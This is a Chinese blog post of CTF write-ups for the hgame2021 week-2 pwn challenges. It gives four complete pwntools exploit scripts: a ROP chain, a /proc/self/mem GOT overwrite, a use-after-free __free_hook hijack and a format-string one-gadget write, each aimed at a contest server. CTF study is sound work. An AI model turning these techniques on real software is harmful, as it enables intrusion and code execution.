hgame2021 week2 pwn刷题

最新推荐文章于 2022-02-18 20:37:12 发布
最新推荐文章于 2022-02-18 20:37:12 发布
阅读量423 收藏 1
点赞数
分类专栏: hgame
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45595732/article/details/113806282
版权

rop_primary

矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell

from pwn import*
import numpy as np
from LibcSearcher import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
elf = ELF('./rop_primary')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
read_plt = elf.plt['read']
open_plt = elf.plt['open']
prdi = 0x401613
prsi_r15 = 0x401611
leave_ret = 0x4015A6
p = remote('159.75.104.107',30372)
payload = ''
p.recvuntil('A:\n')
A = []
B = []
x = 0
n = 0
y = 0
while True:
	line = p.recvuntil('\n').replace('\t',' ')[:-2]
	print line
	if line[0]=='B':
		break
	else:
		A.append(np.array(line.split(),int))
		x = x+1
n = len(A[0])
for i in range(n):
	line = p.recvuntil('\n').replace('\t',' ')[:-2]
	print line
	B.append(np.array(line.split(),int))
y = len(B[0])
c = np.dot(A,B)
print c
for i in range(x):
	for j in range(y):
		p.sendline(str(c[i][j]))
payload = 'a'*0x38+p64(prdi)+p64(read_got)+p64(puts_plt) + p64(0x40157b)
p.sendlineafter('best\n',payload)

libcbase = u64(p.recv(6)+'\x00\x00') - 0x111130
prdx_r12 = libcbase + 0x11c371
write = libcbase + 0x1111d0
pr('libcbase',libcbase)
payload = 'a'*0x30+p64(0x404000+0x500)+p64(prdi)+p64(0)+p64(prsi_r15)+p64(0x404000+0x500)+p64(0)+p64(prdx_r12)+p64(0x300)+p64(0)+p64(read_plt)+p64(leave_ret)
p.sendlineafter('best\n',payload)
payload = p64(0)+p64(prdi)+p64(0)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(read_plt)
payload += p64(prdi)+ p64(0x404000+0x300)+p64(prsi_r15)+p64(0)+p64(0)+p64(prdx_r12)+p64(0)+p64(0)+p64(open_plt)
payload += p64(prdi)+p64(3)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(read_plt)
payload += p64(prdi)+p64(1)+p64(prsi_r15)+p64(0x404000+0x300)+p64(0)+p64(prdx_r12)+p64(0x100)+p64(0)+p64(write)
p.sendline(payload)
p.send('flag'+p64(0))
p.interactive()

the_shop_of_cosmos

卡了一会的题目,一开始只知道/proc/self/maps可以做泄露,但不知道/proc/self/mem可以修改内存。知道/proc/self/mem之后就很好做了,打got表就行。

from pwn import*
context.log_level = 'debug'
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
#p = process('./shop')
libc = ELF('./libc.so.6')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = remote('159.75.104.107',30398)
elf = ELF('./shop')
pbase = 0x555555554000
atoll_got = elf.got['atoll']
p.sendlineafter('>> ','3')
p.sendlineafter('>> ','-10')
p.sendlineafter('>> ','2')
p.sendlineafter('>> ','1')
p.sendlineafter('>> ','/proc/self/maps')
p.recvuntil('shop\n')
pbase = int('0x'+p.recvuntil('-')[:-1],16) - 0x1000
p.recvuntil('7f')
libcbase = int('0x7f'+p.recvuntil('-')[:-1],16)
atoll_got += pbase
system = libcbase + libc.sym['system']
pr('pbase',pbase)
pr('libcbase',libcbase)
pr('atoll_got',atoll_got)
p.sendlineafter('>> ','3')
p.sendlineafter('>> ','1')
p.sendlineafter('>> ','/proc/self/mem')
p.sendlineafter('>> ',str(atoll_got))
p.sendlineafter('>> ','8')
p.sendafter('>> ',p64(system))
p.sendlineafter('>> ','sh')
#gdb.attach(p)
p.interactive()

patriot’s note

常规堆题,uaf,glibc2.27,打__free_hook。

from pwn import*
context.log_level = 'debug'
#p = process('./note')
p = remote('159.75.104.107',30369)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pbase = 0x0000555555554000
onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
def add(size):
	p.sendlineafter('5.exit\n','1')
	p.sendlineafter('write?\n',str(size))

def delete(index):
	p.sendlineafter('5.exit\n','2')
	p.sendlineafter('delete?\n',str(index))

def edit(index,ct):
	p.sendlineafter('5.exit\n','3')
	p.sendlineafter('edit?\n',str(index))
	p.send(ct)

def show(index):
	p.sendlineafter('5.exit\n','4')
	p.sendlineafter('show?\n',str(index))

add(0x500) #0
add(0x10) #1
add(0x10) #2
delete(0)
show(0)
libcbase = u64(p.recv(8)) - (0x7ffff7dcdca0-0x7ffff79e2000)
free_hook = libcbase + libc.sym['__free_hook']
one = libcbase + onegadget[1]
pr('libcbase',libcbase)
pr('free_hook',free_hook)
pr('one',one)
delete(1)
edit(1,p64(free_hook))
add(0x10) #3
add(0x10) #4
edit(4,p64(one))
delete(4)
#gdb.attach(p,'b *'+str(one))
p.interactive()

killerqueen

格式化字符串,本来想单字节单字节写的,发现栈不够用就双字节写了。

from pwn import*
context.log_level = 'debug'
#p = process('./killerqueen')
p = remote('159.75.104.107',30339)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pbase = 0x0000555555554000

onegadget = [0x4f3d5,0x4f432,0x10a41c]
def pr(a,addr):
	log.success(a+'====>'+hex(addr))
p.recv()
p.sendline('0')
weather = int(p.recvuntil(':')[:-1],10)
pr('weather',weather)
p.recv()
p.sendline('tty')
p.send('a')
p.recv()
p.sendline(str(0xFFFFFFFE-weather))
#gdb.attach(p,'b *'+str(pbase+0xC79))
p.recv()
p.send('%24$p-%47$p-%38$p-')
p.recvuntil('0x')
pbase = int('0x'+p.recvuntil('-')[:-1],16) - 0x10b8
libcbase = int(p.recvuntil('-')[:-1],16) - 231 - libc.sym['__libc_start_main']
stackleak = int(p.recvuntil('-')[:-1],16) - 40
one = libcbase + onegadget[2]
pr('pbase',pbase)
pr('libcbase',libcbase)
pr('stackleak',stackleak)
pr('one',one)
payload = ''
a = one & 0xffff
payload += '%'+str(a)+'c'+'%12$hn'
one = one >> 16
a = (one & 0xffff) - a
payload += '%'+str(a)+'c'+'%13$hn'
a = 0x10000+(one>>16) - (one&0xffff)
payload += '%'+str(a)+'c'+'%14$hn'
payload = payload.ljust(0x30,'\x00')
for i in range(3):
	payload += p64(stackleak+i*2)

print payload
p.recv()
p.sendline(payload)
p.sendline('1')
#gdb.attach(p,'b *'+str(one))
p.interactive()
TTYflag
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
PWN-COMPETITION-HGAME2022-Week2
P1umH0的博客
02-04 1794
PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞 当输入的v0为0时,realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".
hgame week1 2021 pwn
清霂的博客
04-23 285
目录onceletter once 写这个题的时候发现了一个工具,可以修改题目加载的libc.so和ld.so文件 patchelf 注释掉的是本地环境下的情况 #!/usr/bin/env python2 #env1=ubuntu 16.04 native #env2=ld-2.27.so libc.2.27 from pwn import * arch = "amd64" filename = "once" context(os="linux", arch=arch, log_level="d
HGAME2021 Week2 Web wp
Lum1n0us's Blog
02-15 481
LazyDogR4U 进链接后发现是一个登录界面,因为东方明珠塔警告,先试试常见路径www.zip/www.rar,发现www.zip能获得网站源码
CTF-PWN-CSTW2(Hgame week2)
SuperGate的博客
02-13 344
程序大概就是这么回事,read_int顾名思义,就是一个读入int的函数。虽然题目中要求我们输入的是一个正数,但是我们可以输入负数,可以将其当作一个突破点。 if(v5<=23)内部的read_n,第一个参数是输入的字符串存入的首地址,第二个参数是读入的长度。这个0x6020e0非常可疑,我们可以先进入其中查看。   发现这是一个程序中的地址,因此在进行字符串读入的时候,字符串被存...
HGAME2021Week1 Writeup
m0_51357657的博客
02-07 1303
小白做完了re还是很开心的 RE部分 Day 1 helloRe 第一天的第一道题~~这道题是真.签到题啊 进入ida,没有明显的main函数,F12查找字符串,看到input flag点进去 发现主函数应该是sub_1400014C0 逻辑很简单,脚本也挺好写的 #include<iostream> using namespace std; int main() { char memory[30] = ""; int v6 = 0x0FF; char asc_[23] = "
hgame:Haskell 游戏引擎
05-30
2. **图形库**:Hgame可能使用如OpenGL或Vulkan等图形库进行图形渲染。在Haskell中,这些库通常通过FFI(Foreign Function Interface)来调用,允许Haskell代码与C/C++等其他语言编写的库进行交互。 3. **数据结构...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
Hgame 2021 week1 pwn刷题
qq_45595732的博客
02-06 1430
whitegive 签到 from pwn import* context.log_level = 'debug' p = remote('182.92.108.71',30210) p.sendlineafter(':',str(0x402012)) p.interactive() letter 开了沙箱,NX未开 orw思路,shellocde from pwn import* context.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/
hgame 2022 PWN 部分题目 Writeup
02-18 3352
hgame 2022 pwn 部分题目writeup
hgame2021 week1 writeup
TF0xn的博客
02-06 2734
目录WebHitchhiking_in_the_Galaxywatermelon宝藏走私者智商检测鸡走私者的愤怒MISCBase全家福不起眼压缩包的养成的方法GalaxyWord REMASTER Web Hitchhiking_in_the_Galaxy 访问页面,提示“我要搭顺风车!”,打开burpsuite抓包重放,提示405 将GET方法改为POST方法重放,提示“只有使用"无限非概率引擎"(Infinite Improbability Drive)才能访问这里~” 修改User-agent头为:I
hgame2021 week3 pwn刷题
qq_45595732的博客
02-21 406
blackgive 栈迁移 from pwn import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) #p = process('./blackgive') p =remote('182.92.108.71',30459) elf = ELF('./blackgive') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') puts_plt =
HGAME2021刷题补题记录(懒 暂时断更)
Npceer-一位网安初学者的博客
02-08 1920
HGAME2021之我真的是web入门选手吗?week1 (应该可以发了吧 我看了下 week1提交好像0分)web(纯fw就写了两题 会补的)什么什么顺风车那题合成大西瓜misc不起眼压缩包的养成方法(未解出 记录一下卡在哪)BASE全家福Galaxycryptoまひと(咒术回战那个)week2(时间没到 就不写了)cryptowhitegiversa week1 (应该可以发了吧 我看了下 week1提交好像0分) web(纯fw就写了两题 会补的) web入门居然web最垃圾 什么什么顺风车那题 进去
Hgame2021 week2 web
feng的博客
02-15 1076
前言 week2的web难度还好,一道变量覆盖,一道SQL注入,一道条件竞争还有一道XSS。因为不会前端。。。XSS没做出来,今天学习一下官方的WP和大师傅们的WP。 LazyDogR4U 存在www.zip,下载下来审一下代码。要想得到flag,需要if($_SESSION['username'] === 'admin'){ 但是正常的登录时没法让session那里是admin的,所以这题其实登录不登录没什么用。 注意这里: $filter = ["SESSION", "SEVER", "COOKIE",
-----已搬运-----Hgame2021 week2 web ---------(条件竞争)(XSS)(sql注入)(代码审计)
Zero_Adam的博客
02-17 493
a
HGAME2021-week2-wp
qq_50438521的博客
02-14 2424
HGAME2021-week2-wp 1.Telegraph:1601 6639 3459 3134 0892 描述: 他曾经最喜欢的曲师写的曲子,让人犹如漫步在星空之下,可如今他听见只觉得反胃。 由于文件名过长,单独给出附件的md5: E5C3EE3F441B860B07A3ADCD98BFFC00 请将flag以hgame{your_flag_here}形式提交,flag为全大写。 题目地址 https://1.oss.hgame2021.vidar.club/Telegraph%EF%BC%9A16
hgame 2021 week2 web re crypto misc
qq_51868336的博客
02-15 1533
杭电hgame2021 week2 week1比较简单就不贴wp了,week3还在做 高光时刻(Nano太强啦,随时就会被超了 web LazyDogR4U www.zip可获得源码,分析一下php就行 submit=getflag&_SESSESSIONSION[username]=admin Post to zuckonit xss,写个爆破md5的脚本,在服务器搭个接收cookie的环境 xss的payload >;eikooc.tnemucod+'=eikooc?php.xedni/
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
最新发布
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值